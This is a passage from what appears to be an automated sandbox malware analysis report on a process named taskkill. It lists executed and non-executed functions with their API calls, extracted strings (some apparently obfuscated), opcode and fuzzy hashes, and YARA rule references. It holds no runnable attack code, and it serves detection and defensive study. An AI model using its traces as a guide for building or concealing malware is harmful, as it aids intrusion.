                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3897564995.0000000000850000.00000040.80000000.00040000.00000000.sdmp, Offset: 00850000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_850000_taskkill.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                                                                                                                      • Opcode ID: eb6040b1fc1fb1cb6ed170ce4c5e49f7b4376ab8879b78008f84ee28e58e6294
                                                                                                                                                                                                                                      • Instruction ID: 667b82d7ad583cab446d3dfca3e3a88bb3cba8630931a3417ca2fbb736ffa752
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: eb6040b1fc1fb1cb6ed170ce4c5e49f7b4376ab8879b78008f84ee28e58e6294
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CCE06D72204304BBD614EE58DC45FAB33ADEFC4710F004408F908A7241CA71B810C7B9
                                                                                                                                                                                                                                      Function 00860C0B Relevance: 1.5, APIs: 1, Instructions: 21threadwindowCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • PostThreadMessageW.USER32(?,00000111), ref: 00860C17
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3897564995.0000000000850000.00000040.80000000.00040000.00000000.sdmp, Offset: 00850000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_850000_taskkill.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessagePostThread
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1836367815-0
                                                                                                                                                                                                                                      • Opcode ID: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                                                                                                                                                                                                                                      • Instruction ID: 1e663e735b98c2ee492d0e16179f4d85efb921fac75554963846a21d638199ba
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2BD0A967B0000C3AAA024584ACC2CFFB72CEB88AA6F004063FB08E2040E6218E020AB0
                                                                                                                                                                                                                                      Function 00867F50 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SetErrorMode.KERNELBASE(00008003,?,?,00861B20,00877E1F,008754DE,00861AE6), ref: 00867F83
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3897564995.0000000000850000.00000040.80000000.00040000.00000000.sdmp, Offset: 00850000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_850000_taskkill.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorMode
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2340568224-0
                                                                                                                                                                                                                                      • Opcode ID: c52c1fa5334ab696d98bab4c8d1040c4722ab1b48ce8c77a9dc0070cc26c4455
                                                                                                                                                                                                                                      • Instruction ID: 99cb465c90f2e2d8bdc01bd8e81a04d60cf69d9fd576de6657ecc3c15852a01f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c52c1fa5334ab696d98bab4c8d1040c4722ab1b48ce8c77a9dc0070cc26c4455
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BCD05B7168420437F640B6A8CC07F96368CE744754F054064F90CDB2C3DD65F4004566
                                                                                                                                                                                                                                      Function 00868178 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetFileAttributesW.KERNELBASE ref: 0086818C
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3897564995.0000000000850000.00000040.80000000.00040000.00000000.sdmp, Offset: 00850000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_850000_taskkill.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                                                                                                                      • Opcode ID: 2e7a4eed9fab79d0e5256d37165c46f5f41f45354434236e51e00be68ebfa084
                                                                                                                                                                                                                                      • Instruction ID: a6d82206153ea5b0d0ffa7fb2955b3b5a8b2d2f3805f08c896b452e4fd84e6dd
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2e7a4eed9fab79d0e5256d37165c46f5f41f45354434236e51e00be68ebfa084
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0AD0A73515500449EB2086FCA8882623784FF87328F240E44E42CCB0E0C5619D5B9100
                                                                                                                                                                                                                                      Function 00867F47 Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SetErrorMode.KERNELBASE(00008003,?,?,00861B20,00877E1F,008754DE,00861AE6), ref: 00867F83
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3897564995.0000000000850000.00000040.80000000.00040000.00000000.sdmp, Offset: 00850000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_850000_taskkill.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorMode
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2340568224-0
                                                                                                                                                                                                                                      • Opcode ID: f5a20f4bfd334fce70a3f08ca5c2edc9af034d296d48a4c6e26f25239d57e607
                                                                                                                                                                                                                                      • Instruction ID: de5760984635ccd1d45126e8469ffca67ef75a41df383a42cb3368218812d0bc
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f5a20f4bfd334fce70a3f08ca5c2edc9af034d296d48a4c6e26f25239d57e607
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 12D0224259C5800EF303A3B02CB07A52BC40F9325EF0A028AC184810A7C2698A09C2D1
                                                                                                                                                                                                                                      Function 04BE2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3899568873.0000000004B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004C99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004C9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004D0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_4b70000_taskkill.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                                                                      • Opcode ID: 507259a0a7247bf8aa6c6d2441b6add725e700e69a44b200047a48920d6eddb5
                                                                                                                                                                                                                                      • Instruction ID: 7c0ed482aab02d91029373cfe542df0629eabaee31ff8a209a62201b0db882bc
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 507259a0a7247bf8aa6c6d2441b6add725e700e69a44b200047a48920d6eddb5
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 63B09B729015C5C5FF15F7614A087177914EFD1705F15C0E1D3070652E4738D1D5E175

                                                                                                                                                                                                                                      Non-executed Functions

                                                                                                                                                                                                                                      Function 04A4DF76 Relevance: 56.5, Strings: 45, Instructions: 209COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3899458998.0000000004A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A40000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_4a40000_taskkill.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                                                                                                                                                                                      • API String ID: 0-3558027158
                                                                                                                                                                                                                                      • Opcode ID: 0995cb93dc2da986c3855a898eb1ba8e37eddfba7faad518aec15b83de7dbbf0
                                                                                                                                                                                                                                      • Instruction ID: 53d15920202cf6cba660764d1147c77d800d6286399c0c8f0f58c0478b820c8c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0995cb93dc2da986c3855a898eb1ba8e37eddfba7faad518aec15b83de7dbbf0
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B7914EF04482988AC7158F54A0652AFFFB1EBC6305F15816DE7E6BB243C3BE89058B85
                                                                                                                                                                                                                                      Function 04BE2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3899568873.0000000004B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004C99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004C9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004D0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_4b70000_taskkill.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ___swprintf_l
                                                                                                                                                                                                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                                                                                                      • API String ID: 48624451-2108815105
                                                                                                                                                                                                                                      • Opcode ID: d66700ffd07f7303c8146339e4dbcf3e42d63cd92a5803b8491c8a1ee66e7570
                                                                                                                                                                                                                                      • Instruction ID: f39c00c2124a046a00c9c0f5eccf66fe6c83b1baac43de56be02fe247f888837
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d66700ffd07f7303c8146339e4dbcf3e42d63cd92a5803b8491c8a1ee66e7570
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7F51F6BAA04116BFDB14DFA98C9097EF7BCFB4820471481E9E569D3641E334FE009BA0
                                                                                                                                                                                                                                      Function 04C52410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3899568873.0000000004B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004C99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004C9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004D0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_4b70000_taskkill.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ___swprintf_l
                                                                                                                                                                                                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                                                                                                      • API String ID: 48624451-2108815105
                                                                                                                                                                                                                                      • Opcode ID: 791528b60df33033706164cf9620fffa6fec3d9e4c612879cff9bacad4112f53
                                                                                                                                                                                                                                      • Instruction ID: f2f2ad28912378b772ce891b7df68fe4b77551d00c8340dc9cd17a3a0603baad
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 791528b60df33033706164cf9620fffa6fec3d9e4c612879cff9bacad4112f53
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D2510371A00645AFDB30DF5CCC9087EB7FAEB48204B4484A9E996D3651E7B4FA808F64
                                                                                                                                                                                                                                      Function 04BD7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 04C14787
                                                                                                                                                                                                                                      • ExecuteOptions, xrefs: 04C146A0
                                                                                                                                                                                                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04C14725
                                                                                                                                                                                                                                      • Execute=1, xrefs: 04C14713
                                                                                                                                                                                                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04C14655
                                                                                                                                                                                                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04C14742
                                                                                                                                                                                                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 04C146FC
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3899568873.0000000004B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004C99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004C9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004D0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_4b70000_taskkill.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                                                                                                      • API String ID: 0-484625025
                                                                                                                                                                                                                                      • Opcode ID: 54cb28af1479d7fc85b1abb677b543437179dfd170ba29afba90fcf95e97a2fa
                                                                                                                                                                                                                                      • Instruction ID: c90a6fdab6e7ecaaa1485b84c9abb75a5aa30f6ee7a1fa0ce28eb2e7d47d8d99
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 54cb28af1479d7fc85b1abb677b543437179dfd170ba29afba90fcf95e97a2fa
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8D510335600219BAEB14EAA9DC89BFA77B9EF09704F1404E9E505AB190FF70BE41DF50
                                                                                                                                                                                                                                      Function 04A43B49 Relevance: 13.8, Strings: 11, Instructions: 68COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3899458998.0000000004A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A40000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_4a40000_taskkill.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: HTQ[$LQWV$L]@L$QUY_$Q[YL$TQ[Y$YHHT$YLQW$YNQ^$YV_]$]@[P
                                                                                                                                                                                                                                      • API String ID: 0-2395860490
                                                                                                                                                                                                                                      • Opcode ID: 384a33eea867b0b9951205cb54ca9814fe172298f9fb4ce77b4bec0070fb2047
                                                                                                                                                                                                                                      • Instruction ID: 5552c94ff39eba50794b6c3f431e81af6caf2441cd6bd36abf29f5fc1eeff400
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 384a33eea867b0b9951205cb54ca9814fe172298f9fb4ce77b4bec0070fb2047
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0B3123B095034CEBCF19DF84D0846DDBBB1FB05B08F814159E86ABF211DB758666CB89
                                                                                                                                                                                                                                      Function 04BEB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3899568873.0000000004B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004C99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004C9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004D0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_4b70000_taskkill.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: __aulldvrm
                                                                                                                                                                                                                                      • String ID: +$-$0$0
                                                                                                                                                                                                                                      • API String ID: 1302938615-699404926
                                                                                                                                                                                                                                      • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                                                                                                                                      • Instruction ID: 65eef3602de74f2e32bc3a0ab4bffd13d8045eaade210778cdb2eab232868618
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C2819170E09249DEEF28CE6AC8517FEBBB1EFC5310F18459AD861A7690D734B841CB50
                                                                                                                                                                                                                                      Function 04C520E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3899568873.0000000004B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004C99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004C9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004D0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_4b70000_taskkill.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ___swprintf_l
                                                                                                                                                                                                                                      • String ID: %%%u$[$]:%u
                                                                                                                                                                                                                                      • API String ID: 48624451-2819853543
                                                                                                                                                                                                                                      • Opcode ID: c992e817f321ede7e7874d3dd34c51db1bd39653ecb719f2c6ebe87ed8e49fd0
                                                                                                                                                                                                                                      • Instruction ID: 4b0e708e5610cb1aa2693053910635fd12337a263d20ee7e7c8d0d773add9838
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c992e817f321ede7e7874d3dd34c51db1bd39653ecb719f2c6ebe87ed8e49fd0
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D321537AA00119ABDB10EEB9DC40ABF77F9EF54644F0401A6ED05D3210E730AE459FA5
                                                                                                                                                                                                                                      Function 04A43C8E Relevance: 8.8, Strings: 7, Instructions: 71COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3899458998.0000000004A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A40000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_4a40000_taskkill.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: A]Tf$BX^_$TSzX$p_UC$sDX]$uc~x$|^KX
                                                                                                                                                                                                                                      • API String ID: 0-1930476458
                                                                                                                                                                                                                                      • Opcode ID: 4f04e769f2cd3a5102cdb32da622571c3dbdb771ce6b2871ddce329b7a25f3ec
                                                                                                                                                                                                                                      • Instruction ID: 54b81a02d763d90922881e00ec2de9cc436c31fc6091beef0ec9ef8114b2be91
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4f04e769f2cd3a5102cdb32da622571c3dbdb771ce6b2871ddce329b7a25f3ec
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 353153B051438CEACB18CF94D4456CEBBB2FF04358F918119E90A6F206DB768259CB89
                                                                                                                                                                                                                                      Function 04BCF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • RTL: Re-Waiting, xrefs: 04C1031E
                                                                                                                                                                                                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04C102BD
                                                                                                                                                                                                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04C102E7
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3899568873.0000000004B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004C99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004C9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004D0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_4b70000_taskkill.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                                                                                                                      • API String ID: 0-2474120054
                                                                                                                                                                                                                                      • Opcode ID: 93218183d2c96598de2b8daa9bb691160e01de2280a47d85891b842f57a35da9
                                                                                                                                                                                                                                      • Instruction ID: cfe2dec1f7299160884c4ad77a7527279ef5643a56093b47d367b63a5e98977e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 93218183d2c96598de2b8daa9bb691160e01de2280a47d85891b842f57a35da9
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 81E1CD30604741DFD725CF29C884B2AB7E2FB89314F140AADE4A58B6E1E774F945DB42
                                                                                                                                                                                                                                      Function 04BDBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • RTL: Re-Waiting, xrefs: 04C17BAC
                                                                                                                                                                                                                                      • RTL: Resource at %p, xrefs: 04C17B8E
                                                                                                                                                                                                                                      • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 04C17B7F
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3899568873.0000000004B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004C99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004C9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004D0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_4b70000_taskkill.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                                                                                      • API String ID: 0-871070163
                                                                                                                                                                                                                                      • Opcode ID: c78fbcb7e6ff34eb9305b2aed1ed29822e391ff166f3bb57f662327b5d910f89
                                                                                                                                                                                                                                      • Instruction ID: 5fdb7df48ad0c335410c25ce05d723f314c3ff3c526dbe860ee12de08602f60d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c78fbcb7e6ff34eb9305b2aed1ed29822e391ff166f3bb57f662327b5d910f89
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5C4114313057029FDB24DE25C840F6AB7E6EF89710F100AADF85ADB690EB70F5059B91
                                                                                                                                                                                                                                      Function 04BDB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04C1728C
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • RTL: Re-Waiting, xrefs: 04C172C1
                                                                                                                                                                                                                                      • RTL: Resource at %p, xrefs: 04C172A3
                                                                                                                                                                                                                                      • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 04C17294
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3899568873.0000000004B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004C99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004C9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004D0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_4b70000_taskkill.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                      • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                                                                                      • API String ID: 885266447-605551621
                                                                                                                                                                                                                                      • Opcode ID: 3c96866a5221c1a97ddd32c6f3335cde147648012d85a78e8c50bcdb73353505
                                                                                                                                                                                                                                      • Instruction ID: 242083818c1e4afe74ea81cb9a0ce0809b8783e2b19f42a3eb222a32d9815ab6
